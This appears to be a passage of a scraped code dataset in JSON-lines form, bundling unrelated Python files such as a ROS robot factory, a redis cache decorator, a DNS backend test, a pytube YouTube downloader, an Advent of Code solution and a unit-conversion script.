[\n\t\t\t\t[sample(bump, [row - 1, col - 1])],\n\t\t\t\t[sample(bump, [row, col - 1])],\n\t\t\t\t[sample(bump, [row + 1, col - 1])],\n\t\t\t\t[sample(bump, [row - 1, col])],\n\t\t\t\t[sample(bump, [row, col])],\n\t\t\t\t[sample(bump, [row + 1, col])],\n\t\t\t\t[sample(bump, [row - 1, col + 1])],\n\t\t\t\t[sample(bump, [row, col + 1])],\n\t\t\t\t[sample(bump, [row + 1, col + 1])]]\n\n\t\t\tz = np.array(z, dtype=np.float32)\n\t\t\tz = z / 255.0 * z_scale\n\t\t\t\t\n\t\t\t\n\t\t\tm, n, c = lin.lstsq(A, z)[0]\n\t\t\tnormal = (-n, -m, 1)\n\t\t\tnormal /= lin.norm(normal)\n\t\t\tnormal = normal / 2 + 0.5\n\t\t\t\n\t\t\tmap[row][col][0] = int(np.round(normal[0] * 255))\n\t\t\tmap[row][col][1] = int(np.round(normal[1] * 255))\n\t\t\tmap[row][col][2] = int(np.round(normal[2] * 255))\n\treturn map\n\t\t\t\n\t\t\t","sub_path":"ImageEdit/editimage.py","file_name":"editimage.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"529672959","text":"# System\nimport sys\n\n# ROS\nimport rospy\n\n# Robot skills\nfrom .robot import Robot\nfrom .amigo import Amigo\nfrom .hero import Hero\nfrom .mockbot import Mockbot\nfrom .sergio import Sergio\n\n\nROBOTS = {\n \"amigo\": Amigo,\n \"hero\": Hero,\n \"mockbot\": Mockbot,\n \"sergio\": Sergio\n}\n\n\ndef get_robot_from_argv(index, default_robot_name=\"hero\"):\n \"\"\"\n Construct a robot from the name given in the command-line or from the default robot name.\n\n :param index: Index in the command-line arguments where a robot name may be available.\n :param default_robot_name: Name of the robot to use if the command line did not contain a name.\n :return: The constructed robot.\n :raise: RunTimeError if no robot could be created.\n \"\"\"\n if len(sys.argv) > index:\n robot_name = sys.argv[index]\n else:\n robot_name = default_robot_name\n\n return get_robot(robot_name)\n\n\ndef get_robot(name):\n # type: (str) -> Robot\n \"\"\"\n Constructs a robot (api) object based on the provided name\n\n :param name: (str) robot name\n :return: (Robot)\n :raises: RuntimeError\n \"\"\"\n rospy.loginfo(\"Constructing robot {}\".format(name))\n robot_class = ROBOTS.get(name.lower())\n if robot_class is not None:\n return robot_class()\n else:\n raise RuntimeError(\"Don't know which robot to construct with name {}\".format(name))\n","sub_path":"robot_skills/src/robot_skills/get_robot.py","file_name":"get_robot.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"414012142","text":"from redis import Redis\nclient = Redis()\nfrom datetime import datetime\nimport json\n\n\ndef logging_decorator(func):\n def wrapper(**kwargs):\n import logging\n logging.info(\"Calling function {} with args\".format(func.__name__, json.dumps(kwargs)))\n start = datetime.now()\n value = func(**kwargs)\n logging.info(\"Func returned {} in {}\".format(json.dumps(value), datetime.now()-start))\n return wrapper\n\n\ndef redis_decorator_expiry(expiry_time=0):\n\n def redis_hadler(func):\n def wrapper(**kwargs):\n import pdb; pdb.set_trace()\n func_name = func.__name__\n key = func_name + json.dumps(kwargs)\n data = client.get(key)\n if data:\n return json.loads(data)\n else:\n data = func(**kwargs)\n client.setex(key, json.dumps(data), expiry_time)\n return data\n return wrapper\n return redis_hadler","sub_path":"app_redis/app_redis/utils/cache_decorator.py","file_name":"cache_decorator.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"316281211","text":"# -*-coding:utf-8-*- \n\"\"\"\n@Author : llame\n@Software: PyCharm\n@Time : 2020/10/16 2:19 下午\n\"\"\" \n# 题目:输入某二叉树的前序遍历和中序遍历的结果,请重建出该二叉树。\n# 假设输入的前序遍历和中序遍历的结果中都不含重复的数字。\n# 例如输入前序遍历序列{1,2,4,7,3,5,6,8} 和中序遍历序列{4,7,2,1,5,3,8,6},则重建二叉树并返回。\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n # 返回构造的TreeNode根节点\n def reConstructBinaryTree(self, pre, tin):\n # write code here\n if len(pre)==0:\n return None\n root=TreeNode(pre[0])\n TinIndex=tin.index(pre[0])\n root.left=self.reConstructBinaryTree(pre[1:TinIndex+1], tin[0:TinIndex])\n root.right=self.reConstructBinaryTree(pre[TinIndex+1:], tin[TinIndex+1:])\n return root\n def PostTraversal(self,root): #后序遍历\n if root != None:\n self.PostTraversal(root.left)\n self.PostTraversal(root.right)\n print(root.val)\npre=[1,2,4,7,3,5,6,8]\ntin=[4,7,2,1,5,3,8,6]\nS=Solution()\nroot=S.reConstructBinaryTree(pre,tin)\nS.PostTraversal(root)\n\n","sub_path":"algorithm/37-已知二叉树前序中序求后序遍历.py","file_name":"37-已知二叉树前序中序求后序遍历.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"40776374","text":"# Copyright (C) 2013 eNovance SAS \n#\n# Author: Artom Lifshitz \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport eventlet\nimport os\nimport socket\nimport ssl\nfrom designate import exceptions\nfrom designate.tests.test_backend import BackendTestCase\nfrom mock import MagicMock\n# impl_nsd4slave needs to register its options before being instanciated.\n# Import it and pretend to use it to avoid flake8 unused import errors.\nfrom designate.backend import impl_nsd4slave\nimpl_nsd4slave\n\n\nclass NSD4ServerStub:\n recved_command = None\n response = 'ok'\n keyfile = os.path.join(os.path.dirname(__file__), 'nsd_server.key')\n certfile = os.path.join(os.path.dirname(__file__), 'nsd_server.pem')\n\n def handle(self, client_sock, client_addr):\n stream = client_sock.makefile()\n self.recved_command = stream.readline()\n stream.write(self.response)\n stream.flush()\n\n def start(self):\n self.port = 1025\n while True:\n try:\n eventlet.spawn_n(eventlet.serve,\n eventlet.wrap_ssl(\n eventlet.listen(('127.0.0.1', self.port)),\n keyfile=self.keyfile,\n certfile=self.certfile,\n server_side=True),\n self.handle)\n break\n except socket.error:\n self.port = self.port + 1\n\n def stop(self):\n eventlet.StopServe()\n\n\nclass NSD4SlaveBackendTestCase(BackendTestCase):\n __test__ = True\n\n def setUp(self):\n super(NSD4SlaveBackendTestCase, self).setUp()\n self.servers = [NSD4ServerStub(), NSD4ServerStub()]\n [server.start() for server in self.servers]\n impl_nsd4slave.DEFAULT_PORT = self.servers[0].port\n self.config(backend_driver='nsd4slave', group='service:agent')\n self.config(\n servers=['127.0.0.1', '127.0.0.1:%d' % self.servers[1].port],\n group='backend:nsd4slave')\n keyfile = os.path.join(os.path.dirname(__file__), 'nsd_control.key')\n certfile = os.path.join(os.path.dirname(__file__), 'nsd_control.pem')\n self.config(keyfile=keyfile, group='backend:nsd4slave')\n self.config(certfile=certfile, group='backend:nsd4slave')\n self.config(pattern='test-pattern', group='backend:nsd4slave')\n self.nsd4 = self.get_backend_driver()\n\n def tearDown(self):\n super(NSD4SlaveBackendTestCase, self).tearDown()\n [server.stop() for server in self.servers]\n\n def test_create_domain(self):\n context = self.get_context()\n domain = self.get_domain_fixture()\n self.nsd4.create_domain(context, domain)\n command = 'NSDCT1 addzone %s test-pattern\\n' % domain['name']\n [self.assertEqual(server.recved_command, command)\n for server in self.servers]\n\n def test_delete_domain(self):\n context = self.get_context()\n domain = self.get_domain_fixture()\n self.nsd4.delete_domain(context, domain)\n command = 'NSDCT1 delzone %s\\n' % domain['name']\n [self.assertEqual(server.recved_command, command)\n for server in self.servers]\n\n def test_server_not_ok(self):\n self.servers[0].response = 'goat'\n context = self.get_context()\n domain = self.get_domain_fixture()\n self.assertRaises(exceptions.NSD4SlaveBackendError,\n self.nsd4.create_domain,\n context, domain)\n\n def test_ssl_error(self):\n self.nsd4._command = MagicMock(side_effet=ssl.SSLError)\n context = self.get_context()\n domain = self.get_domain_fixture()\n self.assertRaises(exceptions.NSD4SlaveBackendError,\n self.nsd4.create_domain,\n context, domain)\n\n def test_socket_error(self):\n self.nsd4._command = MagicMock(side_effet=socket.error)\n context = self.get_context()\n domain = self.get_domain_fixture()\n self.assertRaises(exceptions.NSD4SlaveBackendError,\n self.nsd4.create_domain,\n context, domain)\n","sub_path":"designate/tests/test_backend/test_nsd4slave.py","file_name":"test_nsd4slave.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"260354144","text":"import pickle\nimport os\nfileDir = os.path.dirname(os.path.realpath(__file__))\nfacelistDir = os.path.join(fileDir,\"facelist.p\")\n\nfacelist = {'Lucas':'person-1','Tapan':'person-2','Daniel':'person-3',\n 'Deepali':'person-4','Yodar':'person-5','Sean':'person-6',\n 'Salasky':'person-7','Qiming':'person-8','Alex':'person-9','Unknown':'Unknown'}\n\npickle.dump(facelist, open(facelistDir, \"wb\"))\n","sub_path":"faceclassifier_recoverpickle.py","file_name":"faceclassifier_recoverpickle.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"325052275","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('projects', '0005_project_main_caption'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='project',\n name='main_alt_tag',\n field=models.CharField(default='I am an alt tag. Please replace me.', max_length=200),\n preserve_default=False,\n ),\n ]\n","sub_path":"projects/migrations/0006_project_main_alt_tag.py","file_name":"0006_project_main_alt_tag.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"14541128","text":"import datetime\n\n\"\"\"\nClass hierarchy\n______________________________________________________\n\n Person\n |\n MITPerson\n |\n _________________________\n | | \n Student Professor\n |\n _______________________________\n | | |\n UG TransferStudent Grad\n\n\"\"\"\n\n\nclass Person(object):\n def __init__(self, name):\n \"\"\" Create person called name \"\"\"\n self.name = name\n self.birthday = None\n\n # assumes space is between first and last name - extract last name\n self.lastName = name.split(' ')[-1]\n\n def getLastName(self):\n \"\"\" Return last name \"\"\"\n return self.lastName\n\n def setBirthday(self, month, day, year):\n \"\"\" Sets self's birthday to birthDate\"\"\"\n self.birthday = datetime.date(year, month, day)\n\n def getAge(self):\n \"\"\" Returns self's current age in days \"\"\"\n if self.birthday is None:\n raise ValueError(\"No birthdate set\")\n return (datetime.date.today() - self.birthday).days\n\n def __lt__(self, other): # custom less than methond\n \"\"\" Returns True if self's name is < other's name, and False otherwise \"\"\"\n if self.lastName == other.lastName:\n return (self.name < other.name)\n return (self.lastName < other.lastName)\n\n def __str__(self):\n \"\"\" Return self's name \"\"\"\n return self.name\n\n\nclass MITPerson(Person):\n nextIDNum = 0 # next ID number to assign\n\n def __init__(self, name):\n Person.__init__(self, name) # initialize Person attribs\n self.idNum = MITPerson.nextIDNum # MITPerson attribute: unique ID\n MITPerson.nextIDNum += 1\n\n def getIdNum(self):\n return self.idNum\n\n def speak(self, utterance):\n return (self.name + \" says: \" + utterance)\n\n # Sorting MIT People user their ID number, not name\n def __lt__(self, other):\n return self.idNum < other.idNum\n\n\nclass Professor(MITPerson):\n def __init__(self, name, department):\n MITPerson.__init__(self, name)\n self.department = department\n\n def speak(self, utterance):\n new = 'In course ' + self.department + ' we say '\n return MITPerson.speak(self, new + utterance)\n\n def lecture(self, topic):\n return self.speak(\"It is obvious that \" + topic)\n\n\n# create new superclass that covers all students\nclass Student(MITPerson):\n pass\n\n\nclass UG(Student):\n def __init__(self, name, classYear):\n MITPerson.__init__(self, name)\n self.year = classYear\n\n def getClass(self):\n return self.year\n\n def speak(self, utterance):\n return (MITPerson.speak(self, \"Yo Bro, \" + utterance))\n\n\nclass Grad(Student):\n pass\n\n\nclass TransferStudent(Student):\n pass\n\n\ndef isStudent(obj):\n return isinstance(obj, Student)\n\n\nclass Grades(object):\n \"\"\"A mapping from students to a list of grades\"\"\"\n\n def __init__(self):\n \"\"\"Create empty grade book\"\"\"\n self.students = [] # list of Student objects\n self.grades = {} # maps idNum -> list of grades\n self.isSorted = True # true if self.students is sorted\n\n def addStudent(self, student):\n \"\"\"\n Assumes: student is of type Student\n Add student to the grade book\n \"\"\"\n if student in self.students:\n raise ValueError('Duplicate student')\n self.students.append(student)\n self.grades[student.getIdNum()] = []\n self.isSorted = False\n\n def addGrade(self, student, grade):\n \"\"\"\n Assumes: grade is a float\n Add grade to the list of grades for a student\n \"\"\"\n try:\n # index into dict using IdNum; returns list of grades\n # then mutates self.grades with added grade\n self.grades[student.getIdNum()].append(grade)\n except:\n raise ValueError(\"Student not in grade book\")\n\n def getGrades(self, student):\n \"\"\" Return a list of grades for student \"\"\"\n try: # return copy of student's grades\n # index into dict using IdNum, then return a copy [:]\n return self.grades[student.getIdNum()][:]\n except KeyError:\n raise ValueError(\"Student not in grade book\")\n\n # USING GENERATOR CONSTRUCT\n def allStudents(self):\n \"\"\" Return a list of students in the grade book \"\"\"\n if not self.isSorted:\n self.students.sort()\n self.isSorted = True\n # return self.students[:]\n for s in self.students:\n yield s # generator\n\n\n\ndef gradeReport(course):\n \"\"\"Assumes: course if of type grades\"\"\"\n report = []\n for s in course.allStudents():\n tot = 0.0\n numGrades = 0\n for g in course.getGrades(s):\n tot += g\n numGrades += 1\n try:\n average = tot/numGrades\n report.append(str(s) + '\\'s mean grade is '\n + str(average))\n except ZeroDivisionError:\n report.append(str(s) + ' has no grades')\n return '\\n'.join(report)\n\n# def gradeReport(course):\n# \"\"\" Assumes: course is of type grades \"\"\"\n# report = []\n# for s in course.allStudents():\n# tot = 0.0\n# numGrades = 0\n\n# for g in course.getGrades(s):\n# tot += g\n# numGrades += 1\n\n# try:\n# average = tot / numGrades\n# report.append(str(s) + '\\'s mean grade is ' + str(average))\n\n# except ZeroDivisionError:\n# report.append(str(s) + ' has no grades')\n\n# return ('\\n'.join)\n\n\nug1 = UG('Matt Damon', 2018)\nug2 = UG('Ben Affleck', 2019)\nug3 = UG('Drew Houston', 2017)\nug4 = UG('Mark Zuckerberg', 2017)\ng1 = Grad('Bill Gates')\ng2 = Grad('Steve Wozniak')\n\nsix00 = Grades()\n\nsix00.addStudent(g1)\nsix00.addStudent(ug2)\nsix00.addStudent(ug1)\nsix00.addStudent(g2)\nsix00.addStudent(ug4)\nsix00.addStudent(ug3)\n\n\nsix00.addGrade(g1, 100)\nsix00.addGrade(g2, 25)\nsix00.addGrade(ug1, 95)\nsix00.addGrade(ug2, 85)\nsix00.addGrade(ug3, 75)\n\nfor e in six00.students:\n print (e)\n\nprint()\nprint(gradeReport(six00))\n\n\n\n# for s in six00.allStudents():\n# print (s.getGrades())","sub_path":"01_MIT_Learning/week_5/lectures_and_examples/Section 2/sec_2_generators_grade.py","file_name":"sec_2_generators_grade.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"39233333","text":"# 例 6-1\ndef sayHello(): # 函数定义\n print(\"Hello World!\") # 函数体\n\n\nsayHello() # 函数调用\n\n\n# 例 6-2\ndef sayHello1(s): # 函数定义\n print(s) # 函数体\n\n\nsayHello1(\"Hello!\") # 函数调用\nsayHello1(\"How are you?\")\n\n\n# 例 6-3\ndef fac(num):\n if num == 1:\n return 1\n elif num < 1:\n return 0\n else:\n ret = 1\n while num > 1:\n ret *= num\n num -= 1\n return ret\n\n\nprint(6, \"!=\", fac(6), sep=\"\")\nprint(16, \"!=\", fac(16), sep=\"\")\nprint(26, \"!=\", fac(26), sep=\"\")\nprint(0, \"!=\", fac(0), sep=\"\")\nprint(1, \"!=\", fac(1), sep=\"\")\n","sub_path":"SXB/venv/函数/函数的定义.py","file_name":"函数的定义.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"455864164","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n Pytube interaction module\n\n\"\"\"\nimport os\nimport time\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pytube.exceptions import PytubeError\nfrom pytube import YouTube, Playlist\nfrom colorama import init, Fore\n\nimport yt_links\nimport yt_graphics\nimport yt_files\n\ninit(autoreset=True)\n\nOLD_PERCENT: int = 0\nTOTAL_MBS: int = 0\nTOTAL_FILES: int = 0\nCURRENT_URL: str = ''\nCURRENT_FILENAME: str = ''\n\"\"\"\nOLD_PERCENT - variable, previous value of downloaded percent. Used to avoid constant\n reprinting of the status on each new chunk of file. Used by callback\n function \"progress_call\"\n\nTOTAL_MBS - variable, total downloaded mbs. Used by callback function \"complete_call\"\n\nTOTAL_FILES - variable, total downloaded files. Used by callback function \"complete_call\"\n\nCURRENT_URL - variable, url for the file we're downloading right now.\n Used by callback function \"complete_call\"\n\nCURRENT_FILENAME - variable, name for the file we're downloading right now.\n Used by callback function \"complete_call\"\n\"\"\"\n\n\ndef download_all(links: list):\n \"\"\"\n Proxy for download_video()\n \"\"\"\n links.sort(key=len)\n total = len(links)\n yt_files.hide_cursor()\n for i, outer_link in enumerate(links, start=1):\n if 'list=' in outer_link:\n inner_links = unfold_playlist(outer_link)\n\n if inner_links:\n request = requests.get(outer_link)\n soup = BeautifulSoup(request.text, 'html.parser')\n title_name = soup.find(\"title\")\n if title_name:\n title = title_name.text\n title = title.replace(' - YouTube', '')\n else:\n title = ''\n\n if i > 1:\n print()\n\n sub_total = len(inner_links)\n print(Fore.MAGENTA + f'Downloading from playlist: {Fore.WHITE + title}')\n print(Fore.MAGENTA + f'{outer_link[0:80]}')\n\n item = yt_files.Record('', outer_link[23:], '!start!', title)\n yt_files.cut_lines(item)\n\n for j, inner_link in enumerate(inner_links, start=1):\n download_video(j, sub_total, inner_link)\n\n item = yt_files.Record('', outer_link, '!complete!', title)\n yt_files.cut_lines(item)\n\n print(Fore.MAGENTA + f'Complete: {len(inner_links)} files')\n if i < len(links):\n print()\n else:\n print('\\n' + Fore.RED + f'Inner links of the playlist are unreachable:')\n print(Fore.RED + outer_link + '\\n')\n else:\n download_video(i, total, outer_link)\n\n\ndef download_video(num: int, total: int, url: str):\n \"\"\"\n Main downloading function\n \"\"\"\n global CURRENT_URL, CURRENT_FILENAME\n\n parameters = {'num': num, 'end': total, 'url': url, 'size': 0, 'percents': 0, 'filename': ''}\n yt_graphics.set_parameters(parameters)\n\n for attempt in range(1, 11): # maximum 10 attempts\n try:\n youtube = YouTube(url=url)\n stream = youtube.streams.filter(progressive=True, file_extension=\"mp4\").first()\n break\n except (PytubeError, ConnectionError):\n yt_graphics.unable_to_reach(attempt)\n time.sleep(1)\n else:\n yt_graphics.unaviable()\n yt_files.cut_lines(yt_files.Record('', url, '[unaviable]', 'Unknown'))\n return\n\n safe_name = 'video_' + str(url[32:]).upper() + '.mp4'\n filename = yt_links.defuse_name(stream.default_filename, safe_name)\n\n parameters = {'num': num, 'end': total, 'url': url, 'size': stream.filesize,\n 'percents': 0, 'filename': filename}\n\n CURRENT_URL = url\n CURRENT_FILENAME = filename\n yt_graphics.set_parameters(parameters)\n\n youtube.register_on_progress_callback(progress_call)\n youtube.register_on_complete_callback(complete_call)\n\n path = yt_files.SAVE_PATH\n if os.path.isfile(path + filename) and os.path.getsize(path + filename) == stream.filesize:\n yt_graphics.call_status_for_already_exist()\n yt_files.cut_lines(yt_files.Record('', url, '[ exist ]', filename))\n else:\n try:\n stream.download(path, filename[0:-4])\n except OSError as error:\n print(Fore.RED + f'Unable to save file: {filename}')\n print(Fore.RED + f'Reason: [{error.strerror}][{error.errno}] - [{error.args}]')\n return\n\n\ndef unfold_playlist(playlist_link):\n \"\"\"\n Get inner links of the playlist from the youtube\n \"\"\"\n inner_links = []\n for _ in range(1, 11): # maximum 10 attempts\n try:\n inner_links = Playlist(playlist_link).parse_links()\n break\n except PytubeError:\n time.sleep(1) # let's try again after 1 second\n\n return inner_links\n\n\ndef complete_call(stream=None, file_handle=None):\n \"\"\"\n Gets called from pytube on finished download\n \"\"\"\n global TOTAL_FILES, TOTAL_MBS\n\n TOTAL_FILES += 1\n TOTAL_MBS += stream.filesize / 1024 / 1024\n\n yt_graphics.call_status_for_complete()\n item = yt_files.Record('', new_url=CURRENT_URL, message='!complete!', name=CURRENT_FILENAME)\n yt_files.cut_lines(item)\n\n\ndef progress_call(stream=None, chunk=None, file_handle=None, remaining=None):\n \"\"\"\n Gets called from pytybe on every new chunk of file\n \"\"\"\n global OLD_PERCENT\n\n complete_bytes = file_handle.tell()\n total_bytes = remaining + complete_bytes\n new_percents = int((complete_bytes / total_bytes) * 100)\n\n if OLD_PERCENT == new_percents:\n # refresh only on changes\n return\n\n OLD_PERCENT = new_percents\n yt_graphics.call_status_for_progres(new_percents)\n","sub_path":"yt_youtube.py","file_name":"yt_youtube.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"288575872","text":"import math\nimport typing\nfrom collections import Counter, defaultdict\nfrom dataclasses import dataclass\nfrom typing import Dict, List, NamedTuple\n\nfrom adventofcode2019.utils.abstract import FileReaderSolution\n\n\nclass Chemical(NamedTuple):\n consumable: int\n name: str\n\n\nclass Recipe(NamedTuple):\n inputs: List[Chemical]\n output: Chemical\n\n @staticmethod\n def parse_recipe_string(input_string: str) -> \"Recipe\":\n \"\"\"Parse a string as a Recipe and return a new Recipe.\n\n :param input_string: Input string, for example \"1 A, 2 B, 3 C => 2 D\n :return Recipe object\n \"\"\"\n inputs, outputs = input_string.strip().split(\" => \")\n\n input_parts = inputs.split(\",\")\n\n input_chemicals = []\n\n for input_part in input_parts:\n consumable, name = input_part.strip().split(\" \")\n input_chemicals.append(\n Chemical(consumable=int(consumable), name=name.strip())\n )\n\n consumable, name = outputs.split(\" \")\n output_chemical = Chemical(consumable=int(consumable), name=name)\n\n new_recipe = Recipe(inputs=input_chemicals, output=output_chemical)\n return new_recipe\n\n\n@dataclass\nclass Node:\n name: str\n edges: list\n\n def __init__(self, name: str):\n self.name = name\n self.edges = []\n\n def add_edge(self, node: \"Node\"):\n self.edges.append(node)\n\n\nclass NanoFactory:\n warehouse: defaultdict\n recipes: Dict[str, Recipe]\n\n def __init__(self):\n self.warehouse = defaultdict(int)\n self.recipes = {}\n\n def read_input(self, input_lines: str):\n for line in input_lines.splitlines():\n recipe = Recipe.parse_recipe_string(line)\n self.recipes[recipe.output.name] = recipe\n\n def _get_requirement_for_one(self, output: str, n: int) -> Dict[str, int]:\n \"\"\"Compute what we need for `n` units of `output` and return this as a Dict.\n For example, with the recipe `4 C, 1 A => 1 CA`, when we need 4 of `CA`, return\n {\"C\": 16, \"A\": 4}\n \"\"\"\n result = {}\n output_recipe = self.recipes.get(output)\n if output_recipe:\n # We can only create multiples, eg if `mutiple` is 10, and `n` is 15,\n # we have to create 20 units.\n multiple_required = output_recipe.output.consumable\n number_needed = math.ceil(n / multiple_required)\n\n for input_recipe in output_recipe.inputs:\n result[input_recipe.name] = input_recipe.consumable * number_needed\n return result\n\n def dep_resolve(self, node: Node, resolved: List, unresolved: List):\n \"\"\"\n Resolve the order in which we need to process out recipe.\n Does checks for circular dependencies ( A->B->C->A )\n Code from https://www.electricmonk.nl\n\n :param node: Root node\n :param resolved: List of resolved nodes\n :param unresolved: List of onresolved nodes\n :return:\n \"\"\"\n unresolved.append(node)\n for edge in node.edges:\n if edge not in resolved:\n if edge in unresolved:\n raise Exception(\n f\"Circular reference detected: {node.name} -> {edge.name}\"\n )\n self.dep_resolve(edge, resolved, unresolved)\n resolved.append(node)\n unresolved.remove(node)\n\n def create_nodes(self) -> Node:\n \"\"\"\n Create all the `Node` instances for the current recipes and return the\n root_node with all the childeren in the Edges\n \"\"\"\n nodes = {}\n root_node: Node\n # Firstly, Creates nodes\n for key, recipe in self.recipes.items():\n node = Node(key)\n nodes[key] = node\n if key == \"FUEL\":\n root_node = node\n\n # Since ORE isn't really output but the result, we add it by hand\n nodes[\"ORE\"] = Node(\"ORE\")\n\n # Next, create all the Edges\n for key, recipe in self.recipes.items():\n for input_recipe in recipe.inputs:\n input_recipe_node = nodes[input_recipe.name]\n nodes[key].add_edge(input_recipe_node)\n\n return root_node\n\n def resolve_tree(self) -> List[Node]:\n \"\"\" Resolve the tree and return a list of nodes in order to process them.\"\"\"\n root_node = self.create_nodes()\n resolved: List[Node] = []\n self.dep_resolve(root_node, resolved, [])\n return resolved\n\n def ore_needed_for_n_fuel(self, n=1) -> int:\n \"\"\" Compute how many ORE we need for `n` fuel object\"\"\"\n # Do a recursive from FUEL to ORE\n resolved = self.resolve_tree()\n\n counter: typing.Counter = Counter()\n # See what we need. We need to start revedsed, because we do not know how many\n # ORE we need for 1 FUEL\n for node in reversed(resolved):\n if len(node.edges) == 0:\n # Ore, doesn't need anything\n continue\n\n if node.name == \"FUEL\":\n qty = n\n else:\n qty = counter[node.name]\n\n requirements_for_node = self._get_requirement_for_one(node.name, qty)\n counter.update(requirements_for_node)\n\n return counter[\"ORE\"]\n\n\nclass Day14:\n pass\n\n\nclass Day14PartA(Day14, FileReaderSolution):\n def solve(self, input_data: str) -> int:\n factory = NanoFactory()\n factory.read_input(input_data)\n ore = factory.ore_needed_for_n_fuel()\n return ore\n\n\nclass Day14PartB(Day14, FileReaderSolution):\n def binary_search(\n self, search: int = 1_000_000_000_000, factory: NanoFactory = None\n ) -> int:\n \"\"\"\n Implement a binary search to search for the magic number\n :param search: The number we want to his\n :param factory: The NanoFactory that generates the ore\n :return: Number if `fuel` that can be created from `search` ore.\n \"\"\"\n if not factory:\n return -1\n\n low = 1\n middle = 0\n high = search\n found = False\n ore_needed = 0\n\n while low < high and not found:\n middle = (low + high + 1) // 2\n ore_needed = factory.ore_needed_for_n_fuel(middle)\n if ore_needed == search:\n return middle\n else:\n if search < ore_needed:\n high = middle - 1\n else:\n low = middle\n\n # Our result may not overshoot the search, remove one if too high\n if ore_needed > search:\n middle -= 1\n return middle\n\n def solve(self, input_data: str) -> int:\n factory = NanoFactory()\n factory.read_input(input_data)\n res = 1_000_000_000_000\n\n res = self.binary_search(res, factory)\n return res\n","sub_path":"src/adventofcode2019/solutions/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"631352214","text":"from pay_py.alipay_mobile_web import Utils\nfrom pay_py import constants\n\ndef alipay_web():\n from pay_py import alipay_mobile_web\n client = alipay_mobile_web.Client(\n constants.partner,\n constants.partner,\n constants.key,\n '../pay_py/cacert_mobile_web.pem',\n )\n pay_url = client.generate_request_url(\n 'notify_url',\n 'return_url',\n Utils.create_out_trade_no(),\n 'subject',\n '0.01',\n 'show_url'\n )\n\n print(pay_url)\n\n\nif __name__ == '__main__':\n alipay_web()","sub_path":"samples/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"275439179","text":"#Writen by: Michael Eckrote\r\n#\r\n# This program is going to accept some input about distance and\r\n# time, and will use that info to determine all sorts of cool things!\r\n\r\n# This container hold how many feet are in various distances\r\ndistance_key_feet = {\r\n 'inch': 1/12, 'Inch': 1/12, 'inches': 1/12, 'Inches': 1/12,\r\n 'Feet': 1, 'feet': 1, 'foot': 1, 'Foot': 1,\r\n 'yard': 3, 'Yard': 3, 'yards': 3, 'Yards': 3,\r\n 'Mile': 5280, 'mile': 5280, 'Miles': 5280, 'miles': 5280,\r\n 'kilometers': 3280.84, 'Kilometers': 3280.84, 'kilometer': 3280.84,'Kilometer': 3280.84,\r\n 'meter': 3.28084, 'Meter': 3.28084, 'meters': 3.28084, 'Meters': 3.28084,\r\n 'centimeter': 0.0328084, 'Centimeter': 0.0328084, 'centimeters': 0.0328084, 'Centimeters': 0.0328084,\r\n 'millimeter': 0.00328084, 'Millimeter': 0.00328084, 'Millimeters': 0.00328084, 'millimeters': 0.00328084\r\n}\r\n\r\n# This container holds how many hours are in various units of time\r\ntime_key_hours = {\r\n 'seconds': 0.000277778, 'Seconds': 0.000277778, 'second': 0.000277778, 'Second': 0.000277778, 'sec': 0.000277778, 'secs': 0.000277778, 'Sec': 0.000277778, 'Secs': 0.000277778,\r\n 'minutes': 0.0166667, 'Minutes': 0.0166667, 'minute': 0.0166667, 'Minute': 0.0166667, 'min': 0.0166667, 'Min': 0.0166667, 'mins': 0.0166667, 'Mins': 0.0166667,\r\n 'hour': 1, 'Hour': 1, 'hours': 1, 'Hours': 1,\r\n 'day': 24, 'Day': 24, 'days': 24, 'Days': 24,\r\n 'year': 8760, 'Year': 8760, 'years': 8760, 'Years': 8760\r\n}\r\n\r\n# The section asks the user for all the required info (5 prompts)\r\n\r\n# 1\r\nchosen_location = input(\r\n 'Think of a location you travel\\n'\r\n 'to every day; preferable somewhere\\n'\r\n 'close like work or school:\\n'\r\n ''\r\n)\r\nprint('')\r\n\r\n#2\r\ndistance_to_location = float(input(\r\n 'Enter the distance you travel\\n'\r\n 'going to %s in whatever unit of\\n'\r\n 'measurement that you want 